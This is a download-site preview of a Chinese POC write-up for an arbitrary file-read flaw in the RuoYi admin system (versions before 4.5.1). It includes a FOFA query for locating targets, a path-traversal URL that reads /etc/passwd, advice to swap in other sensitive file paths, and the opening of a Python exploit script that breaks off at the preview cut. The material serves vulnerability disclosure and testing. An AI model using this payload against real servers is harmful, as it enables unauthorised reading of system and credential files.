没有合适的资源?快使用搜索试试~ 我知道了~
Thinkergod#PeiQi-WIKI-POC#若依管理系统 后台任意文件读取 CNVD-2021-019312
需积分: 0 0 下载量 155 浏览量
2022-07-25
14:32:48
上传
评论
收藏 4KB MD 举报
温馨提示
试读
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app="
资源推荐
资源详情
资源评论
# 若依(RuoYi)管理系统 后台任意文件读取
## 漏洞描述
若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件
## 漏洞影响
> [!NOTE]
>
> RuoYi < v4.5.1
## FOFA
> [!NOTE]
>
> app="若依-管理系统"
## 漏洞复现
登录后台后访问 Url
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd
![](image/ruoyi-1.png)
访问后会下载文件 **/etc/passwd**
![](image/ruoyi-2.png)
可以使用Burp抓包改变 **/etc/passwd** 为其他文件路径获取敏感信息
![](image/ruoyi-4.png)
![](image/ruoyi-5.png)
在新版本的修复中添加了过滤
![](image/ruoyi-7.png)
## 漏洞利用POC
> [!NOTE]
>
> POC使用需要后台的Cookie,读取的文件路径应为根路径
```python
import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0
点击阅读更多
资源评论
明儿去打球
- 粉丝: 15
- 资源: 327
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功